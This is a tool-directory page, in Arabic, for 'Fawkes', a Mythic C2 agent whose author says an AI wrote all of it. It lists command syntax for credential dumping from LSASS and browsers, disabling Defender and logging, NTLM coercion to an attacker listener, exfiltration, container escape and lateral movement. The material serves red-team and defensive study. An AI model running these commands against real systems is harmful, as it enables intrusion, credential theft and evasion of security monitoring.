Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
fawkes — Fawkes هو وكيل Mythic C2 بلغة Golang كُتب حصريًا بواسطة الذكاء الاصطناعي. | Kitploit
أدوات/GitHubGitHub/galoryber/fawkes
أدوات دفاعيةأطر اختبار الاختراقتصعيد الامتيازاتأطر الاستغلالالحركة الجانبيةما بعد الاستغلالأمن السحابةالقيادة والسيطرةتطوير الحمولاتالهروب من الحاوية
GitHubgaloryber/fawkes
356منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

fawkes

Fawkes هو وكيل Mythic C2 بلغة Golang كُتب حصريًا بواسطة الذكاء الاصطناعي.

عرض المستودع

Fawkes Mythic C2 Agent

Fawkes هو وكيل Mythic C2 تمت برمجته بالكامل عبر الأوامر الصوتية (vibe-coded). بدأ كـ"أتساءل" وتحول إلى هدف. هدفي هو ألا أكتب سطرًا واحدًا من الكود لهذا الوكيل، بل أنتجه حصريًا من خلال موجه (prompt).

في البداية حاولت كتابة الوكيل بنفسي، ولكن بعد استنساخ الحاوية النموذجية، وقراءة توثيق Mythic، ومشاهدة فيديوهات سلسلة التطوير على يوتيوب، ونسخ الكود من وكلاء آخرين مثل Merlin أو Freyja، قررت أنه ليس لدي وقت لتطوير وكيل خاص بي. لكن الموجّه (prompt) – هذا هو ما أملك وقتًا له.

Fawkes هو وكيل مبني على لغة Go مع إمكانيات عبر المنصات. يدعم Windows (حمولات EXE وDLL وshellcode)، وLinux (ملفات ELF ثنائية ومكتبات مشتركة)، وmacOS (ملفات Mach-O ثنائية لـ Intel وApple Silicon). إجمالي 213 أمرًا: 113 عبر المنصات، 82 مخصصة لـ Windows فقط، 21 لـ Unix فقط، 11 لـ Linux فقط، و6 لـ macOS فقط (بعض الأوامر لها تطبيقات خاصة بالمنصة تشترك في اسم واحد مواجه للمستخدم، مثل screenshot). يدعم الخروج عبر HTTP والربط من نظير إلى نظير (P2P) عبر TCP للتنقل الداخلي.

التثبيت

لتثبيت Fawkes، ستحتاج إلى تثبيت Mythic على جهاز بعيد. يمكنك العثور على تعليمات التثبيت لـ Mythic في صفحة مشروع Mythic.

من دليل تثبيت Mythic:``` ./mythic-cli install github https://github.com/galoryber/fawkes

root@kitploit:~
## مرجع سريع للأوامرالأمر | الصيغة | الوصف
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | قراءة/تعديل قوائم التحكم في الوصول (DACLs) للكائنات في Active Directory (إضافة/إزالة ACEs، منح DCSync، GenericAll، النسخ الاحتياطي/الاستعادة). عبر المنصات (T1222.001, T1098, T1003.006).
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | تعداد خدمات شهادات Active Directory، البحث عن قوالب ضعيفة (ESC1-ESC4، ESC6 عبر DCOM)، طلب الشهادات عبر DCOM لاستغلال ESC1/ESC6، أو الاستغلال التلقائي (بحث ← تحليل ← سلسلة طلب). عبر المنصات (T1649).
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(Windows فقط)** إدارة تدفقات البيانات البديلة (ADS) لـ NTFS — كتابة، قراءة، سرد، أو حذف تدفقات البيانات المخفية. يدعم النص ورموز الترميز السداسية الثنائية. MITRE T1564.004.
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | الاستعلام وتنظيف آثار الطب الشرعي الخاصة بالتنفيذ. Windows: Shimcache. Linux: recently-used.xbel، الصور المصغرة، Tracker. macOS: العناصر الحديثة، KnowledgeC، الحجر الصحي (T1070.004).
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(Windows فقط)** حقن العملية عن بُعد. `-method apc` (الافتراضي) يقوم بإدراج الشيل كود عبر NtQueueApcThread في خيط قابل للتنبيه (استخدم `ts` للعثور على واحد). `-method hwbp` يرفق عبر DebugActiveProcess، ويضبط نقطة توقف أجهزة DR0 على API مستهدف (افتراضي `ntdll!NtDelayExecution`)، ويعيد توجيه Rip إلى الشيل كود عند إطلاق نقطة التوقف — لا حاجة إلى TID، لا قائمة APC، لا CreateRemoteThread (T1055.004, T1055).
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | تسجيل الصوت من الميكروفون ورفع ملف WAV. Windows (waveIn)، Linux (arecord/parecord)، macOS (rec/ffmpeg). عبر المنصات (T1123).
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(Windows فقط)** الاستعلام وتعديل سياسات تدقيق Windows. تعطيل تسجيل أحداث الأمان قبل العمليات الحساسة. الوضع المخفي يعطل الفئات الفرعية الهامة للكشف. يستخدم واجهة AuditQuerySystemPolicy API (T1562.002).
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(Windows فقط)** تنفيذ أمر مع وسيطات عملية مزيفة. يتجاوز Sysmon Event ID 1 وقياس عن بُعد سطر أوامر EDR (T1564.010).
arp | `arp [-ip <subnet>]` or `arp -action spoof -target <IP> -gateway <IP>` | عرض جدول ARP مع التصفية، أو تسميم ذاكرة التخزين المؤقت ARP لتحديد المواقع MITM (T1557.002). التزوير: Linux فقط، يستعيد عند التنظيف.
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | طلب تذاكر AS-REP للحسابات التي لا تتطلب المصادقة المسبقة واستخراج التجزئات بتنسيق hashcat للتكسير دون اتصال. التعداد التلقائي عبر LDAP. عبر المنصات (T1558.004).
av-detect | `av-detect [-deep true]` | كشف برامج الحماية من الفيروسات/EDR/الأمان المثبتة من خلال فحص العمليات الجارية مقابل قاعدة بيانات تضم أكثر من 130 توقيع. مع `--deep`، يتحقق أيضًا من وحدات النواة، ووحدات systemd، وأدلة التكوين بحثًا عن المنتجات المثبتة ولكن غير العاملة (Linux). يبلغ عن المنتج، البائع، النوع، و PID. عبر المنصات.
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(Windows فقط)** تصحيح دالة تلقائيًا بالقفز إلى أقرب تعليمة إرجاع (C3). مفيد لتجاوزات AMSI/ETW.
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | مجموعة أدوات ترميز البيانات: base64، XOR (بمفتاح نصي/سداسي)، hex، ROT13، ترميز URL بنسبة مئوية، تشفير قيصر. جميعها تدعم إدخال/إخراج الملفات. عبر المنصات (T1132.001, T1140, T1027).
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(Windows فقط)** إدارة وظائف نقل BITS للثبات وتنزيل الملفات بشكل خفي. إنشاء، تعليق، استئناف، إكمال الوظائف وتعيين أوامر الإشعار للثبات. تبقى الوظائف بعد إعادة التشغيل (T1197).
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | حصاد بيانات المتصفح من Chromium و Firefox و Safari. التاريخ، الملء التلقائي، الإشارات المرجعية، التنزيلات عبر المنصات. كلمات المرور: Chromium (DPAPI/Keychain/GNOME Keyring)، Firefox (فك تشفير key4.db NSS)، Safari (Keychain macOS). ملفات تعريف الارتباط Firefox على جميع المنصات. MITRE T1555.003, T1217.
cat | `cat <file>` or `cat -path <file> -start N -end N -number true` | عرض محتويات الملف مع نطاق أسطر اختياري، ترقيم، وحماية من الحجم 5 ميجابايت.
cd | `cd <directory>` | تغيير دليل العمل الحالي.
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | تعديل أذونات الملف/الدليل بتدوين ثماني (755، 644) أو رمزي (+x، u+rw، go-w). دعم تكراري. عبر المنصات (T1222).
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(لينكس/macOS فقط)** تغيير ملكية الملف/الدليل بواسطة اسم المستخدم/UID واسم المجموعة/GID. دعم تكراري (T1222).
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | فحص شهادات TLS على المضيفين البعيدين — تحديد CAs، الشهادات الموقعة ذاتيًا، تاريخ الانتهاء، SANs، إصدار TLS، مجموعات التشفير، وبصمات SHA256. عبر المنصات (T1590.001).
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(Windows فقط)** تعداد مخازن شهادات Windows للعثور على شهادات توقيع التعليمات البرمجية، شهادات مصادقة العميل، والمفاتيح الخاصة. يبحث في CurrentUser و LocalMachine. MITRE T1552.004, T1649.
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | قراءة/كتابة الحافظة أو المراقبة المستمرة للتغييرات مع كشف أنماط بيانات الاعتماد. عبر المنصات (T1115).
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | بيانات وصفية سحابية، استخراج بيانات الاعتماد، تعداد IAM، تعداد التخزين، الثبات، والوصول إلى مخازن الأسرار. storage/aws-s3/azure-blob/gcp-gcs: تعداد المجموعات/الحاويات مع كائنات نموذجية. aws-ssm: مخزن معلمات SSM مع فك التشفير. azure-keyvault: أسرار Key Vault عبر الهوية المدارة. gcp-secrets: مدير الأسرار عبر حساب الخدمة. aws-persist/azure-persist: إنشاء مفاتيح وصول/تسجيلات تطبيق طويلة الأمد. الكشف التلقائي. IMDSv2. عبر المنصات (T1552.005, T1580, T1530, T1098.001).
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | إنشاء، سرد، استخراج، تخزين، أو تسريب الأرشيفات. التخزين يشفر باستخدام AES-256-GCM. التسريب ينقل إلى Mythic. exfil-https: رفع إلى روابط S3/Azure/GCS الموقعة مسبقًا مع تحميل مجزأ، رؤوس مخصصة، تموج. exfil-github: تسريب عبر GitHub Contents API. عبر المنصات (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001).
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | إكراه مصادقة NTLM عبر MS-EFSR (PetitPotam)، MS-RPRN (PrinterBug)، MS-FSRVP (ShadowCoerce). يجبر الهدف على المصادقة على مستمع المهاجم. دعم تمرير التجزئة (Pass-the-hash). عبر المنصات (T1187).
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | عرض أو تعديل تكوين الوكيل أثناء التشغيل، أو التحديث الذاتي للوكيل الثنائي. `show`/`set`: وقت النوم، التموج، تاريخ الإيقاف، ساعات العمل. `update`: تنزيل حمولة جديدة من Mythic، التحقق، الإطلاق، والخروج من الوكيل الحالي. عبر المنصات (T1105).
container-detect | `container-detect` | كشف بيئة تشغيل الحاوية (Docker، K8s، LXC، Podman، WSL). يتحقق من متجهات الهروب مثل مآخذ Docker وحسابات خدمة K8s. عبر المنصات (T1082, T1497.001).
container-escape | `container-escape -action <check\|docker-sock\|cgroup\|nsenter\|mount-host\|k8s-enum\|k8s-secrets\|k8s-rbac\|k8s-nodes\|k8s-etcd\|k8s-deploy\|k8s-exec> [-command '<cmd>'] [-path <ns>\|<ns1,ns2,...>\|*] [-kubeconfig /path/to/config]` | **(لينكس فقط)** الهروب من الحاوية + عمليات K8s — مأخذ Docker، cgroup، nsenter، تركيب جهاز المضيف. K8s: تعداد البودات/الخدمات، قراءة الأسرار، **k8s-rbac**: مسح ClusterRole/RoleBinding + تسجيل مسار تصعيد الامتيازات (crit/warn/info)، **k8s-nodes**: سطح هجوم عقد الكتلة (kubelet/OS/kernel/CIDR/taints/roles)، **k8s-etcd**: اكتشاف نقاط نهاية etcd العميل من وسيطات بود المستوى التحكم + استقصاء `/version` غير المصادق لكل نقطة نهاية (قراءة غير مصادقة = اختراق كامل للكتلة)، نشر/تنفيذ البودات عبر API. **خارج الكتلة**: `-kubeconfig` يقبل ملفات kubeconfig المسروقة للوصول إلى K8s من مضيفات غير حاوية (مصادقة رمز + شهادة عميل) (T1611, T1610, T1613, T1552.007, T1069.003, T1087.004).
cp | `cp <source> <destination>` | نسخ ملف من المصدر إلى الوجهة.
cred-check | `cred-check [-action check\|verify-all] -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-timeout <seconds>]` | اختبار بيانات الاعتماد ضد SMB و WinRM و LDAP على المضيفات المستهدفة. `verify-all` يختبر جميع بيانات الاعتماد المخزنة ضد المضيفات المكتشفة بالتوازي. عبر المنصات (T1110.001, T1078).
cred-harvest | `cred-harvest -action <shadow\|cloud\|configs\|history\|windows\|m365-tokens\|browser-live\|all\|dump-all> [-user <username>]` | حصاد بيانات الاعتماد: تجزئات الظل (Unix)، تكوينات السحابة (AWS/GCP/Azure/K8s)، أسرار التطبيق، فحص سجل القشرة بحثًا عن كلمات مرور/رموز/مفاتيح API مسربة، سجل PowerShell + متغيرات البيئة + RDP (Windows)، رموز M365 OAuth/JWT من TokenBroker/Teams/Outlook (Windows)، **browser-live**: سرقة ملفات تعريف الارتباط الحية، localStorage، sessionStorage عبر بروتوكول أدوات المطور Chrome (CDP) من Chrome/Edge الجاري. **dump-all**: سلسلة مهام فرعية آلية — تشغيل hashdump + lsa-secrets + cred-harvest جميعها بالتوازي (Windows). عبر المنصات (T1552, T1003.008, T1528, T1539).
credential-prompt | `credential-prompt [-action dialog\|device-code\|mfa-phish] [-title "Authentication Required"] [-message "Enter your credentials..."] [-icon caution]` | عرض مربع حوار بيانات اعتماد أصلي، إساءة استخدام تدفق رمز جهاز OAuth، أو تصيد رموز MFA. dialog: AppleScript (macOS)، CredUI (Windows)، zenity/kdialog (Linux). device-code: تدفق رمز جهاز OAuth Azure AD لالتقاط الرمز. mfa-phish: مربع حوار تحقق MFA مزيف لالتقاط رموز TOTP. عبر المنصات (T1056.002, T1621, T1111).
curl | `curl -url <URL> [-method GET\|PUT\|POST] [-file <path>] [-upload raw\|multipart] [-headers '{"K":"V"}'] [-body <data>]` | طلبات HTTP + رفع ملف التسريب (T1567). رفع إلى روابط S3 الموقعة مسبقًا، Azure SAS، نقاط نهاية عامة. عبر المنصات (T1106, T1567.002).
cut | `cut -path <file> -delimiter <char> -fields <1,3\|1-3\|2-> [-chars <1-10>]` | استخراج الحقول أو نطاقات الأحرف من أسطر الملف. محددات مخصصة، مواصفات النطاق. عبر المنصات (T1083).
credman | `credman [-action <list\|dump\|vault>] [-filter <pattern>]` | تعداد مخازن بيانات الاعتماد الخاصة بالمنصة. Windows: مدير بيانات الاعتماد + الخزنة (CredEnumerateW، vaultcli.dll). Linux: سلسلة مفاتيح GNOME (secret-tool)، KDE KWallet، كلمات مرور WiFi/VPN لـ NetworkManager، حسابات GNOME عبر الإنترنت. macOS: عناصر Keychain (كلمات مرور عامة + إنترنت)، كلمات مرور WiFi. `list`=بيانات وصفية، `dump`=مع الأسرار، `vault`=Windows فقط. MITRE T1555.004, T1555.001.
defender | `defender -action <status\|exclusions\|add-exclusion\|remove-exclusion\|threats\|enable\|disable> [-type <path\|process\|extension>] [-value <val>]` | **(Windows فقط)** إدارة Defender — الحالة، الاستثناءات، التهديدات، تمكين/تعطيل الحماية في الوقت الفعلي. MITRE T1562.001.
dpapi | `dpapi -action <decrypt\|masterkeys\|chrome-key> [-blob <base64>] [-entropy <base64>]` | **(Windows فقط)** فك تشفير كتلة DPAPI (CryptUnprotectData)، تعداد المفاتيح الرئيسية، استخراج مفتاح تشفير Chrome/Edge. MITRE T1555.003/T1555.005.
email | `email -action <count\|search\|read\|folders> [-folder <name>] [-query <keyword>] [-index <n>]` | **(Windows فقط)** الوصول إلى صندوق بريد Outlook عبر COM. عد الرسائل، البحث بكلمة رئيسية، القراءة حسب الفهرس، سرد المجلدات. MITRE T1114.001.
dcom | `dcom -action <exec\|upload\|exec-staged\|check> -host <target> -command <cmd> [-args <arguments>] [-object mmc20\|shellwindows\|shellbrowser\|wscript\|excel\|outlook]` | **(Windows فقط)** تنفيذ الأوامر، رفع الملفات، أو التخزين والتنفيذ على المضيفين البعيدين عبر DCOM. `check` يتحقق من متطلبات RPC/DCOM المسبقة. upload: نقل الملفات عبر تخزين certutil/PowerShell. exec-staged: رفع ثم تنفيذ مع تنظيف تلقائي. ستة كائنات COM. MITRE T1021.003, T1570.
debug-detect | `debug-detect` | كشف المصححات المرفقة، أدوات التحليل، والأجهزة. Windows: IsDebuggerPresent، NtQueryInformationProcess، PEB، سجلات DR. Linux: TracerPid، LD_PRELOAD، خرائط الذاكرة (Frida/Valgrind/sanitizers)، VM/صندوق الرمل، مراقبة eBPF (Falco/Tetragon/Tracee)، إطار auditd، نطاق ptrace. macOS: sysctl P_TRACED، DYLD_INSERT_LIBRARIES، كشف VM (sysctl)، منتجات الأمان (EDR/AV)، بيئة صندوق الرمل/التحليل. الكل: فحص عملية المصحح (T1497.001).
dcsync | `dcsync [-action sync\|domain-takeover] -server <DC> -username <user> [-password <pass>] [-hash <NT hash>] [-target <account[,account2]>]` | DCSync — تكرار بيانات اعتماد AD عبر DRS دون لمس LSASS. `domain-takeover` يشغل kerberoast + asrep-roast + dcsync krbtgt/Administrator بالتوازي. عبر المنصات (T1003.006).
df | `df [-filesystem <device>] [-mount_point <path>] [-fstype <type>]` | الإبلاغ عن استخدام مساحة قرص نظام الملفات مع تصفية اختيارية للجهاز، نقطة التثبيت، أو نوع نظام الملفات. عبر المنصات (T1082).
diff | `diff -file1 <path> -file2 <path> [-context <n>]` | مقارنة ملفين وعرض الاختلافات بتنسيق diff موحد. خوارزمية قائمة على LCS مع أسطر سياق قابلة للتكوين. عبر المنصات (T1083).
dns | `dns -action <resolve\|reverse\|srv\|mx\|ns\|txt\|cname\|all\|dc\|zone-transfer\|wildcard\|exfil\|doh> -target <host> [-server <dns_ip>]` | تعداد DNS — حل المضيفين، الاستعلام عن السجلات، اكتشاف وحدات التحكم بالنطاق، نقل المنطقة، كشف النطاقات البديلة، الاستعلام المخفي عبر DNS-over-HTTPS، تسريب DNS. عبر المنصات (T1018, T1071.004, T1048.001).
du | `du -path <file_or_dir> [-max_depth <n>]` | الإبلاغ عن استخدام القرص للملفات والدلائل. تحليل الحجم حسب الدليل الفرعي، مرتبة حسب الأكبر. عبر المنصات (T1083).
drivers | `drivers [-filter <name>]` | تعداد برامج تشغيل النواة/الوحدات المحملة. Windows: EnumDeviceDrivers، Linux: /proc/modules، macOS: تعداد kext. عبر المنصات (T1082).
domain-policy | `domain-policy -action <all\|password\|lockout\|fgpp> -server <DC> -username <user@domain> -password <pass>` | تعداد سياسة كلمة مرور/قفل AD و FGPP عبر LDAP. توصيات آمنة ضد الرش. عبر المنصات (T1201).
crontab | `crontab -action <list\|add\|remove> [-entry <cron_line>] [-program <path>] [-schedule <schedule>]` | **(لينكس/macOS فقط)** سرد، إضافة، أو إزالة وظائف cron للثبات. يدعم إدخالات cron الخام أو صيغة البرنامج+الجدول.
download | `download <path>` or `download {"path": "/file", "compress": true}` | تنزيل ملف أو دليل من الهدف. الملفات الأكبر من 1 ميجابايت تُضغط تلقائيًا بـ gzip (قابلة للتكوين). الدلائل تُضغط تلقائيًا إلى zip. التحقق من تجزئة SHA256. نقل مجزأ، تكامل مستعرض الملفات.
drives | `drives` | سرد الأقراص/وحدات التخزين المتاحة وأنظمة الملفات المثبتة مع النوع، التسمية/الجهاز، والمساحة الحرة/الإجمالية.
enum-tokens | `enum-tokens [-action list\|unique] [-user <filter>]` | **(Windows فقط)** تعداد رموز الوصول عبر جميع العمليات. `list` يُظهر PID/المستخدم/النزاهة/الجلسة لكل عملية. `unique` يجمع حسب المستخدم مع أعداد العمليات. تمكين SeDebugPrivilege تلقائيًا (T1134, T1057).
encrypt | `encrypt -action <encrypt\|decrypt\|encrypt-files\|decrypt-files\|corrupt\|corrupt-files> -path <file_or_glob> [-key <base64key>] [-confirm SIMULATE\|CORRUPT]` | تشفير/فك تشفير AES-256-GCM (T1486) + إتلاف ملف مستهدف (T1565). corrupt: الكتابة فوق رؤوس الملفات ببيانات عشوائية. بوابات أمان مطلوبة للعمليات الهدامة.
env | `env [-action <list\|get\|set\|unset>] [-name <VAR>] [-value <val>] [-filter <pattern>]` | سرد، الحصول، تعيين، أو إلغاء تعيين متغيرات البيئة لعملية الوكيل. التغييرات موروثة من قبل العمليات الفرعية. عبر المنصات.
env-scan | `env-scan [-pid <PID>] [-filter <pattern>]` | مسح متغيرات بيئة العملية بحثًا عن بيانات اعتماد مسربة، مفاتيح API، وأسرار. أكثر من 35 نمط كشف عبر فئات السحابة، قواعد البيانات، CI/CD، والعملات المشفرة. Linux + macOS (T1057, T1552.001).
etw | `etw -action <sessions\|rules\|agents\|patch\|restore\|blind-all\|...> [-session_name <name>] [-provider <guid\|shorthand>]` | **(Windows, Linux, macOS)** التلاعب بنظام التدقيق/القياس عن بُعد. Windows: جلسات/مزودي ETW إيقاف/تعمية/تعمية الكل/تمكين/تصحيح/استعادة. Linux: قواعد auditd، journald مسح/تدوير، تكوين syslog، كشف وكيل SIEM. macOS: التسجيل الموحد، كشف وكيل الأمان. (T1562, T1070.002).
eventlog | `eventlog -action <list\|query\|clear\|info\|enable\|disable> [-channel <name\|unit\|subsystem\|path>] [-event_id <id>] [-filter <xpath\|keyword\|timewindow>] [-count <max>]` | إدارة سجلات أحداث النظام. Windows: قنوات wevtapi.dll. Linux: وحدات journald وملفات syslog. macOS: أنظمة/عمليات التسجيل الموحد (os_log). سرد المصادر، الاستعلام عن الأحداث، مسح/تفريغ السجلات، الحصول على المعلومات. MITRE T1070.001, T1562.002.
execute-memory | `execute-memory -arguments 'arg1 arg2' -timeout 60` | تنفيذ ثنائي أصلي من الذاكرة. Linux: memfd_create (لا كتابة على القرص). macOS: ملف مؤقت مع توقيع ad-hoc. Windows: ملف مؤقت مع تنظيف فوري. جميع المنصات تزيل الآثار بعد التنفيذ. MITRE T1620.
execute-shellcode | `execute-shellcode [-technique mmap\|memfd] [-encoding none\|xor\|aes] [-key hex]` | تنفيذ الشيل كود في العملية الحالية. يدعم شيل كود مشفر بـ XOR/AES-256-CTR مع فك تشفير أثناء التشغيل (T1027). Windows: VirtualAlloc + CreateThread. Linux: mmap (افتراضي) أو memfd_create. macOS: MAP_JIT (ARM64) أو mmap. عبر المنصات (T1059.006, T1620).
exit | `exit` | أمر الوكيل بالخروج.
file-attr | `file-attr -path <file> [-attrs "+hidden,-readonly,+immutable"]` | الحصول على أو تعيين سمات الملف — مخفي، للقراءة فقط، نظام (Windows)؛ غير قابل للتغيير، ملحق، nodump (Linux)؛ مخفي، غير قابل للتغيير (macOS). احذف -attrs لعرض الأعلام الحالية. عبر المنصات (T1564.001, T1222).
file-type | `file-type -path <file_or_dir> [-recursive true] [-max_files 100]` | تحديد أنواع الملفات بواسطة البايتات السحرية (أكثر من 35 توقيع). مسح ملف واحد أو دليل. يكتشف الملفات التنفيذية، الأرشيفات، المستندات، الصور، قواعد البيانات، الوسائط، والمزيد. عبر المنصات (T1083).
find | `find -pattern <glob> [-path <dir>] [-min_size <bytes>] [-max_size <bytes>] [-newer <min>] [-older <min>] [-type f\|d] [-perm suid\|sgid\|writable\|executable\|<octal>] [-owner <user\|uid>]` | البحث عن الملفات بالاسم، الحجم، التاريخ، الأذونات، أو المالك. العثور على ثنائيات SUID، الملفات القابلة للكتابة عالميًا، الملفات المملوكة لمستخدمين محددين. عبر المنصات (T1083).
find-admin | `find-admin -hosts <targets> -username <user> -password <pass> [-method smb\|winrm\|both] [-hash <NT>] [-action scan\|auto-move] [-lateral_method psexec\|wmi] [-lateral_command <cmd>]` | مسح المضيفين لاكتشاف أين تتمتع بيانات الاعتماد بوصول إداري عبر SMB (مشاركة C$) و/أو WinRM. **auto-move**: سلسلة مهام فرعية آلية — العثور على مضيفين إداريين ثم الانتقال أفقيًا إلى كل منهم عبر psexec/wmi. يدعم CIDR، نطاقات IP، PTH، المسح المتوازي (T1021.002, T1021.006).
firewall | `firewall -action <list\|add\|delete\|enable\|disable\|status\|pf-add\|pf-delete\|pf-list> [-name <rule>] [-direction <in\|out>] [-protocol <tcp\|udp\|any>] [-port <port>]` | **(Windows, macOS, Linux)** إدارة قواعد جدار الحماية. Windows: COM API. macOS: ALF + قواعد pf المثبتة. Linux: iptables/nftables (اكتشاف تلقائي). دعم مرسى PF لتصفية حزم macOS. MITRE T1562.004.
getprivs | `getprivs -action list\|enable\|disable\|strip [-privilege <name>]` | **(Windows, macOS, Linux)** سرد الامتيازات/الإمكانيات. Windows: امتيازات الرمز مع تمكين/تعطيل/تجريد. Linux: إمكانيات العملية (CapEff/CapPrm) + سياق SELinux/AppArmor. macOS: الصلاحيات، صندوق الرمل، المجموعات (T1134.002).
getsystem | `getsystem [-technique steal\|potato\|check\|sudo\|osascript]` | **(Windows, Linux, macOS)** تصعيد الامتيازات. Windows: SYSTEM عبر سرقة الرمز أو DCOM potato. Linux: التحقق من متجهات التصعيد (SUID، sudo، الإمكانيات، docker) أو محاولة رفع sudo. macOS: التحقق من المتجهات، sudo، أو موجه osascript الإداري (T1134, T1548).
gpp-password | `gpp-password -server <DC> -username <user@domain> -password <pass>` | البحث في SYSVOL عن ملفات XML الخاصة بـ GPP ذات سمات cpassword المشفرة وفك تشفيرها باستخدام مفتاح AES المنشور (MS14-025). عبر المنصات عبر SMB (T1552.006).
gpo | `gpo -action <list\|links\|find\|all> -server <DC> -username <user@domain> -password <pass> [-filter <name>]` | تعداد كائنات نهج المجموعة عبر LDAP — سرد GPOs، تعيين الروابط مع التنفيذ، البحث عن إعدادات CSE المثيرة للاهتمام. عبر المنصات (T1615).
grep | `grep -pattern <regex> [-path <dir>] [-extensions .txt,.xml] [-ignore_case] [-max_results 100]` | البحث في محتويات الملف عن أنماط التعبير العادي. بحث تكراري في الدلائل مع تصفية الامتداد، أسطر السياق، وتخطي الملفات الثنائية. عبر المنصات (T1083, T1552.001).
hash | `hash -path <file_or_dir> [-algorithm md5\|sha1\|sha256\|sha512] [-recursive true] [-pattern *.exe] [-max_files 500]` | حساب تجزئات الملفات (MD5، SHA-1، SHA-256، SHA-512). ملفات فردية أو دلائل مع تصفية نمط glob والتحكم في العمق. عبر المنصات (T1083).
hexdump | `hexdump -path <file> [-offset <bytes>] [-length <bytes>]` | عرض محتويات الملف بتنسيق سداسي+ASCII على طريقة xxd. التحكم في الإزاحة والطول لفحص مناطق محددة، بحد أقصى 4096 بايت. عبر المنصات (T1005).
handles | `handles -pid <pid> [-type File] [-show_names] [-max_count 500]` | **(Windows, Linux, macOS)** تعداد مقابض/واصفات الملفات المفتوحة في عملية. Windows: NtQuerySystemInformation. Linux: /proc/pid/fd. macOS: lsof (T1057, T1082).
hashdump | `hashdump [-action dump\|insitu\|insitu-full\|tickets\|auto-spray] [-targets <hosts>] [-format json]` | **(Windows, Linux, macOS)** استخراج تجزئات كلمة مرور الحساب المحلي. Windows: تجزئات NTLM من سجل SAM (يتطلب SYSTEM)؛ **insitu**: تعداد جلسات تسجيل الدخول النشطة عبر واجهات LSA داخل العملية (يتطلب مسؤول)؛ **insitu-full**: فتح lsass.exe بـ PROCESS_VM_READ، مسح توقيعات lsasrv.dll بحثًا عن LogonSessionList، التنقل في القائمة المرتبطة، تراكب تخطيط KIWI_MSV1_0_LIST_63 على كل عقدة لتحليل LUID/UserName/Domain/AuthPackage/LogonType/Credentials-pointer، التنقل في سلسلة بيانات الاعتماد لكل AuthPackage عند credentials_ptr لالتقاط كل غلاف KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC، مسح توقيعات LsaInitializeProtectedMemory_Internal لاستعادة IV / h3DesKey / hAesKey BCrypt key globals بالإضافة إلى بايتات IV الخام 16 بايت / 3DES 24 بايت / AES 32 بايت، فك تشفير AES-256-CFB / 3DES-CBC لكل كتلة نص مشفر مأخوذة (مختارة لكل كتلة حسب `len % 8`)، وتراكب تخطيط KIWI_MSV1_0_PRIMARY_CREDENTIAL_10_NEW لاستخراج تجزئات NT/LM/SHA — مُخرجة بتنسيق `username:rid:lm:nt:::` المتوافق مع خطاف ProcessResponse credential-vault الخاص بإجراء dump (Phase 2B + 2C-i + 2C-ii-a + 2C-ii-b + 2C-ii-c، Win10 21H2 — Win11 23H2، يتطلب مسؤول). Linux: تجزئات /etc/shadow مع تحديد نوع التجزئة (يتطلب root). macOS: تجزئات PBKDF2 لخدمات الدليل من ملفات plist الخاصة بالمستخدم (يتطلب root). **auto-spray**: تفريغ التجزئات ثم رشها تلقائيًا عبر cred-check ضد المضيفين المستهدفين. MITRE T1003.002, T1003.008.
